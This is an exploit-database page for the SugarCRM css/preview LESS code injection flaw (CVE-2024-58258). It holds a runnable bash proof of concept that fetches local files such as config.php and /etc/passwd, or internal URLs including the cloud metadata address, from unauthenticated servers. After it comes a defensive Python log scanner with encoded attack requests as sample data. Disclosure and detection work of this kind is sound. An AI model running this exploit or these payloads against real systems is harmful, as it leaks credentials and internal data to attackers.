SugarCRM 14.0.0 – SSRF/Code Injection

Exploit Details

Basic Information

Exploit Title SugarCRM 14.0.0 – SSRF/Code Injection
Exploit ID EDB-ID:52365
Type exploitdb
Published 2025-07-16T00:00:00
Modified 2025-07-16T00:00:00

CVSS Information

CVSS Score 7.2
Severity HIGH
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2024-58258

Exploit Code

# Exploit Title : SugarCRM 14.0.0 – SSRF/Code Injection
# Author: Egidio Romano aka EgiX
# Email : [email protected]
# Software Link: https://www.sugarcrm.com
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
# CVE Reference: CVE-2024-58258
#
# Vulnerability Description:
#
# User input passed through GET parameters to the /css/preview REST API
# endpoint is not properly sanitized before parsing it as LESS code. This can
# be exploited by remote, unauthenticated attackers to inject and execute
# arbitrary LESS directives. By abusing the @import LESS statement, an
# attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
# local files on the web server, potentially leading to the disclosure of
# sensitive information.

# Proof of Concept:

#!/bin/bash

echo
echo "+----------------------------------------------------------------------+";
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
echo "+----------------------------------------------------------------------+";

if [ "$#" -ne 2 ]; then
    echo -ne "\nUsage.....: $0 \n"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
    echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
    echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
    exit 1
fi

# Percent-encode every byte of the argument (hex dump, then prefix each pair with %).
urlencode() {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
}

# Inline-import the requested file/URL, followed by a data: URI that serves as an end marker.
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")

RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")

if echo "$RESPONSE" | grep -q "________"; then
    echo -e "\nOutput for '$2':\n"
    # Print everything up to the marker line, then drop the marker itself.
    echo "$RESPONSE" | sed '/________/q' | grep -v '________'
    echo
else
    echo -e "\nError: exploit failed!\n"
    exit 2
fi

# Credits: Vulnerability discovered by Egidio Romano.
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/
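The description above tells a defender what an exploitation attempt looks like on the wire: a request to rest/v10/css/preview whose query string percent-decodes to LESS directives, with an @import whose target is either a local path or a URL. The following is an added example, not part of the advisory and not SugarCRM's code: it scans combined-format web-server access log lines (constructed sample lines embedded below, not real traffic) for such requests and classifies each @import target as a local file read or an SSRF attempt, and it includes an allowlist check of the shape a fix might apply before the value reaches a LESS parser. The endpoint path and parameter names come from the advisory; the log format, the `ff0000` benign value and the allowed character set in `is_plain_token` are assumptions.

```python
"""Defender-side checks for CVE-2024-58258 (SugarCRM css/preview LESS injection).

Added example: not part of the advisory or of SugarCRM's code.  Parses
combined-format access logs, finds requests to the vulnerable endpoint whose
query parameters decode to LESS directives, and classifies the @import target.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
# Lines 1 and 2 carry percent-encoded LESS payloads of the shape the PoC builds
# (every byte hex-encoded in line 1, partial encoding in line 2); line 3 is a
# benign request to the same endpoint (assumed value); line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jul/2025:10:00:01 +0000] "GET /sugarcrm/rest/v10/css/preview?baseUrl=1&param=%31%3b%20%40%69%6d%70%6f%72%74%20%28%69%6e%6c%69%6e%65%29%20%27%2f%65%74%63%2f%70%61%73%73%77%64%27%3b HTTP/1.1" 200 5123 "-" "curl/8.0"
203.0.113.7 - - [16/Jul/2025:10:00:02 +0000] "GET /sugarcrm/rest/v10/css/preview?baseUrl=1&param=1%3B%20%40import%20%28inline%29%20%27http%3A%2F%2Flocalhost%3A9200%2F_search%27%3B HTTP/1.1" 200 874 "-" "curl/8.0"
198.51.100.4 - - [16/Jul/2025:10:00:03 +0000] "GET /sugarcrm/rest/v10/css/preview?baseUrl=1&param=ff0000 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Jul/2025:10:00:04 +0000] "GET /sugarcrm/index.php?module=Home HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PREVIEW_PATH = "/rest/v10/css/preview"          # endpoint named in the advisory
IMPORT_RE = re.compile(r"@import\b", re.IGNORECASE)
# @import, an optional "(inline)"-style option list, then a quoted target.
IMPORT_TARGET_RE = re.compile(r"""@import\s*(?:\([^)]*\)\s*)?['"]([^'"]*)['"]""", re.IGNORECASE)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Any of these in a value means a LESS parser would see more than a plain token.
LESS_META_RE = re.compile(r"[@;{}]")


def classify_target(target):
    """An @import of a URL is SSRF; anything else is a local file read."""
    return "ssrf" if SCHEME_RE.match(target) else "local_file_read"


def analyse_request(line):
    """Return a finding dict for a suspicious css/preview request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith(PREVIEW_PATH):
        return None
    # parse_qs percent-decodes once, which is what the server does with the query.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            if not LESS_META_RE.search(value):
                continue
            finding = {
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "param": name,
                "decoded": value,
                "severity": "medium",
                "kind": "less_metacharacters",
                "target": None,
            }
            if IMPORT_RE.search(value):
                finding["severity"] = "high"
                found = IMPORT_TARGET_RE.findall(value)
                target = found[0] if found else None
                finding["target"] = target
                finding["kind"] = classify_target(target) if target else "import_unparsed_target"
            return finding
    return None


def scan_log(text):
    """Run analyse_request over every line and collect the findings."""
    return [f for f in (analyse_request(l) for l in text.splitlines()) if f]


def is_plain_token(value, max_len=64):
    """Assumed allowlist of the shape a fix might apply before a value reaches the
    LESS parser.  The advisory does not state what the endpoint legitimately
    accepts, so this character set is an assumption, not SugarCRM's patch."""
    return bool(re.fullmatch(r"[A-Za-z0-9#_.\-]{1,%d}" % max_len, value))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} severity={f['severity']} kind={f['kind']} "
              f"param={f['param']} target={f['target']!r}")
```

Run as-is it reports the first two sample lines (a local file read of /etc/passwd and an SSRF to localhost:9200) and stays silent on the benign and unrelated lines. Because the script decodes the query the same way the server does, the fully hex-encoded form produced by the PoC's `urlencode` and a lightly encoded form both surface the same `@import`; matching on the raw percent-encoded string would miss one of them.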
